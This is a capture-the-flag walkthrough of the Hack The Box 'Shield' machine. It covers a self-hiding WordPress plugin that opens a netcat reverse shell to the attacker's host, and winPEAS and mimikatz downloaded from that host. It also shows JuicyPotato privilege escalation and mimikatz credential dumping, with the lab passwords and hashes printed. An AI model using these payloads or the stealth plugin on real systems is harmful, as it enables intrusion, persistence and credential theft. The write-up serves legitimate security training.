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586 lines (431 loc) · 21.4 KB

File metadata and controls

586 lines (431 loc) · 21.4 KB

Shield is a 4th box from Starting Point path on This path is composed of 9 boxes in a way that later boxes use information (in a form of credentials) gathered from the previous ones.

This box features only a root flag. Don't waste your time on finding the user.txt - until this is corrected by the Dev Team. I've raised this issue already, so this article will be updated accordingly when status is changed. UPDATE: Apparently this is solved right now and information "No Flag" for user flag is shown correctly both for Shield and Vaccine.


  1. Basic Information
  2. Target of Evaluation
  3. Recon
  4. WordPress Admin Panel Access
  5. Weaponize
  6. Exploiting Low Privilege Shell Access
  7. Vulnerability Scanning
  8. Exploiting
  9. Post-exploitation
  10. Cleanup
  11. Additional Readings

Basic Information

Type Starting Point
Name Hack The Box / Shield
Pwned 2021/06/03
Author Asentinn / OkabeRintaro

Target of Evaluation

Machine is accessible on port


Fire up port scan (-A for OS detection, version detection, script scanning, and traceroute):

$ nmap -A

Starting Nmap 7.91 ( ) at 2021-06-01 00:17 CEST
Nmap scan report for
Host is up (0.045s latency).
Not shown: 998 filtered ports
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 15.86 seconds

Trying to connect to the MySQL instance:

$ mysql -h
ERROR 1130 (HY000): Host '10.10.XX.XXX' is not allowed to connect to this MySQL server

Oh, so that's what unauthorized from nmap scan meant.

Grabbing hosting data from HTTP headers (just in case):

Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.1.29

Web directory enumeration:

$ gobuster dir -w /usr/wl/dirbuster-m.txt -x txt,php -u
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/wl/dirbuster-m.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
2021/06/03 00:17:19 Starting gobuster in directory enumeration mode
/wordpress            (Status: 301) [Size: 152] [-->]
Progress: 50817 / 661683 (7.68%)
[!] Keyboard interrupt detected, terminating.

2021/06/03 00:21:02 Finished

It is a WordPress installation, so after a while with no other paths pop up, I'm terminating the gobuster.

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WordPress Admin panel access

WordPress landing page


I'm trying the known so far usernames and password from the previous boxes: admin/P@s5w0rd! lets me in.

It looks just like basic WP installation without internet access (errors from update feature and no plugin store).

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To get access to the web server I'm going to upload a payload with netcat binary and PHP file that establish reverse shell to my host.


This code hides plugin on the admin panel so it won't be easy tracked by other hackers

   Plugin Name: It's Not A Reverse Shell Plugin
   Plugin URI:
   description: A plugin that definitely is not creating a revershe shell.
   Version: 1.0
   Author: Asentinn
   Author URI:
   License: MIT

   function plugin_hide_pshield() {
    global $wp_list_table;
    $hidearr = array('pshield_plugin/pshield_plugin.php');
    $myplugins = $wp_list_table->items;
    foreach ($myplugins as $key => $val) {
      if (in_array($key,$hidearr)) {

  remove_action('pre_current_active_plugins', 'plugin_hide_pshield');
  add_action('pre_current_active_plugins', 'plugin_hide_pshield');


Executes reverse PowerShell

# wp_config.php

  system("nc342as.exe -e powershell.exe 10.10.XX.XXX 9002")


Allows to remotely delete the contents of the plugin, leaving only the main plugin file with the dummy data. This way if you want to update the payload, call this file and then deactivate and remove Example plugin.

# wp_cleanup.php


file_put_contents("pshield_plugin.php", base64_decode("PD9waHAgICAKLyoKICAgUGx1Z2luIE5hbWU6IEV4YW1wbGUKICAgUGx1Z2luIFVSSTogaHR0cHM6Ly9leGFtcGxlLmNvbQogICBkZXNjcmlwdGlvbjogCiAgIFZlcnNpb246IDEuMAogICBBdXRob3I6IE1lCiAgIEF1dGhvciBVUkk6IGh0dHBzOi8vZXhhbXBsZS5jb20KICAgTGljZW5zZTogTUlUCiAgICovCj8+Cg=="));



Plugin archive ready for upload

$ zip *
  adding: nc342as.exe (deflated 53%)
  adding: pshield_plugin.php (deflated 45%)
  adding: wp_cleanup.php (deflated 38%)
  adding: wp_config.php (deflated 6%)

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Exploiting (low privilege shell access)

After uploading the plugin and activating it, each time I want to get the PS reverse shell I start netcat listener and navigate to the following URL:

Also, as you can see - plugin is not visible. The only thing that reveals it is running is a number of visible plugins in comparison to All number on GUI.


Reverse shell (low privilege)

Trying to get database connection details from wp-config.php:

PS C:\inetpub\wwwroot\wordpress> cat wp-config.php


// ...

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress124');

/** MySQL database username */
define('DB_USER', 'wordpressuser124');

/** MySQL database password */
define('DB_PASSWORD', 'P_-U9dA6q.B|');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

// ...

Copied for later use:

  • Database: wordpress124
  • Credentials: wordpressuser124/P_-U9dA6q.B|

Database enumeration

By using mysql I am looking for the cached credentials and sensitive information that will help me find a flag.

mysql --user=wordpressuser124 --password='P_-U9dA6q.B|' --database=wordpress124 -e "select * from wp_users;"

ID	user_login	user_pass	user_nicename	user_email	user_url	user_registered	user_activation_key	user_status	display_name
1	admin	$P$Bgz58wVx7mKpwW3AcNv6VNstbMeyQ30	admin	[email protected]		2020-02-04 15:40:47	1622581404:$P$BrWeD9Vdxf2/vtWQsEO7hJAlOAGkMQ0	0	admin

With a help of WP Sec resource I'm trying to guess the password stored in pass.hash using rockyou wordlist:

$ hashcat -O -m 400 -a 0 -o pass.txt pass.hash /usr/wl/rockyou.txt

Meanwhile, I'm dumping data from other tables, but nothing useful come up.

In a gesture of resignation I'm downloading the winPEAS from my Python simple server.

(New-Object System.Net.WebClient).DownloadFile('http://10.10.XX.XXX/pea3r3efr.exe','pea3r3efr.exe');

At that time hashcat finished its work and because he didn't manage to guess it, with high probability this is a dead end.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: phpass
Hash.Target......: $P$Bgz58wVx7mKpwW3AcNv6VNstbMeyQ30
Time.Started.....: Sat Jun  5 20:37:23 2021 (10 mins, 25 secs)
Time.Estimated...: Sat Jun  5 20:47:48 2021 (0 secs)
Guess.Base.......: File (/usr/wl/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    17321 H/s (4.31ms) @ Accel:1024 Loops:256 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 14344385/14344385 (100.00%)

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Vulnerability scanning

Some of the more interesting findings from winPEAS

Host details

Hostname: Shield
    Domain Name: MEGACORP.LOCAL
    ProductName: Windows Server 2016 Standard
    EditionID: ServerStandard
    ReleaseId: 1607
    BuildBranch: rs1_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
    Architecture: AMD64
    ProcessorCount: 2
    SystemLang: en-US
    KeyboardLang: English (United States)
    TimeZone: (UTC-08:00) Pacific Time (US & Canada)
    IsVirtualMachine: True
    Current Time: 6/2/2021 4:09:48 PM
    HighIntegrity: False
    PartOfDomain: True

LSA and credentials

[+] LAPS Settings
   [?] If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: LAPS not installed

  [+] Wdigest
   [?] If enabled, plain-text crds could be stored in LSASS
    Wdigest is not enabled

  [+] LSA Protection
   [?] If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key)
    LSA Protection is not enabled

  [+] Credentials Guard
   [?] If enabled, a driver is needed to read LSASS memory
    CredentialGuard is not enabled
    Virtualization Based Security Status:      Not enabled
    Configured:                                False
    Running:                                   False

  [+] Cached Creds
   [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user
    cachedlogonscount is 10

  [+] AV Information
  [X] Exception: Invalid class 
    No AV was detected!!
    Not Found


[+] UAC Status
   [?] If you are in the Administrators group check how to bypass the UAC
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    FilterAdministratorToken: 0
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.


[+] Enumerating NTLM Settings
  LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)

  NTLM Signing Settings
      ClientRequireSigning    : False
      ClientNegotiateSigning  : True
      ServerRequireSigning    : False
      ServerNegotiateSigning  : False
      LdapSigning             : Negotiate signing (Negotiate signing)

  Session Security
      NTLMMinClientSec        : 536870912 (Require 128-bit encryption)
      NTLMMinServerSec        : 536870912 (Require 128-bit encryption)

  NTLM Auditing and Restrictions
      InboundRestrictions     :  (Not defined)
      OutboundRestrictions    :  (Not defined)
      InboundAuditing         :  (Not defined)
      OutboundExceptions      : 

// ...

[+] Enumerating Named Pipes
  Name                                                                                                 Sddl

  eventlog                                                                                             O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

  vgauth-service                                                                                       O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)

Users and groups

Current user: IUSR
  Current groups: Everyone, Users, Console Logon, Authenticated Users, This Organization, Local

    SHIELD\Administrator: Built-in account for administering the computer/domain
        |->Groups: Administrators
        |->Password: CanChange-NotExpi-Req

    SHIELD\DefaultAccount(Disabled): A user account managed by the system.
        |->Groups: System Managed Accounts Group
        |->Password: CanChange-NotExpi-NotReq

    SHIELD\Guest(Disabled): Built-in account for guest access to the computer/domain
        |->Groups: Guests
        |->Password: NotChange-NotExpi-NotReq

Token manipulation




Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft 

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName          
-------  ------    -----      -----     ------     --  -- -----------          
     57       4     1916       3528       0.02   3096   0 cmd                  
     85       7     1148       5548       0.02   3664   0 conhost              
    330      13     1852       4148               376   0 csrss                
    222      15     1800       4016               492   1 csrss                
    215      13     3692      12856              2456   0 dllhost              
    363      25    19616      44360               856   1 dwm                  
   1281      52    19748      71400              3592   1 explorer             
      0       0        0          4                 0   0 Idle                 
    414      20     9716      36940              3996   1 LockApp              
    336      17    10176      41840              2828   1 LockAppHost          
    452      22    14836      34136              3188   1 LogonUI              
    892      27     5144      14820               624   0 lsass                
    224      17    16708      17424              1748   0 MsDepSvc             
    190      13     2872       9884              2724   0 msdtc                
    496      66   142284     133208              1848   0 MsMpEng              
  42843      11    92972      29528              1720   0 mysqld               
    107       8     1088       4548       0.05   4108   0 nc342as              
    125      18    30188      37856              3392   0 php-cgi              
    128      18    29688      37452              4632   0 php-cgi              
    656      36    53276      63652       1.50   4428   0 powershell           
    336      19     8948      26132              3984   1 RuntimeBroker        
    557      28    12052      44020              1700   1 SearchUI             
    264      10     3616       7828               616   0 services             
    674      28    14268      44832               908   1 ShellExperienceHost  
    377      15     3840      18220              4028   1 sihost               
     51       2      388       1224               276   0 smss                 
    429      22     5920      16296              1580   0 spoolsv              
    890       0      128        140                 4   0 System               
    250      16     2892      13728              3004   1 taskhostw            
    140      11     3088      10240              1860   0 VGAuthService        
    105       7     1368       5668              1148   0 vm3dservice          
    105       8     1484       6660              3288   1 vm3dservice          
    335      21     8972      20716              1812   0 vmtoolsd             
    201      17     4980      14812              3528   1 vmtoolsd             
    221      28     6856      15316              3320   0 w3wp                 
     93       9     1052       4976               484   0 wininit              
    201      10     2152      15924               560   1 winlogon             
    322      21    10064      25276              2600   0 WmiPrvSE             
    250      13    10884      19484              3160   0 WmiPrvSE             
    195      12     3124      11292              4676   0 WmiPrvSE 

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One thing should raise your attention is that SeImpersonatePrivilege is set. This is causing a potential vulnerability that can be exploited using JuicyPotato (read more in Additional readings section)

echo START C:\inetpub\wwwroot\wordpress\wp-content\plugins\pshield_plugin\nc342as.exe -e powershell.exe 10.10.XX.XXX 9004 > jp52345.bat
.\jp324d.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\plugins\pshield_plugin\jp52345.bat -l 9004 -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}


C:\Users\Administrator\Desktop>type root.txt
type root.txt

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Because I've got the System access and I know that future boxes can use some credentials from this one - I'm downloading the mimikatz to read the logged in sandra user.

powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.XX.XXX/mc231.exe','mc231.exe')"


Read credentials from a memory

mimikatz # privilege::debug
Privilege '20' OK

Useless information are truncated from below output.

mimikatz # sekurlsa::logonpasswords

// ...

Authentication Id : 0 ; 291603 (00000000:00047313)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 6/7/2021 4:13:28 PM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
	msv :	
	 [00000003] Primary
	 * Username : sandra
	 * Domain   : MEGACORP
	 * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
	 * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
	 * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
	tspkg :	
	wdigest :	
	 * Username : sandra
	 * Domain   : MEGACORP
	 * Password : (null)
	kerberos :	
	 * Username : sandra
	 * Domain   : MEGACORP.LOCAL
	 * Password : Password1234!
	ssp :	
	credman :	



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Before wp_cleanup.php call

2092810927112.png After:


Remember to close all shells before deleting plugin from WordPress admin.


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Additional Readings

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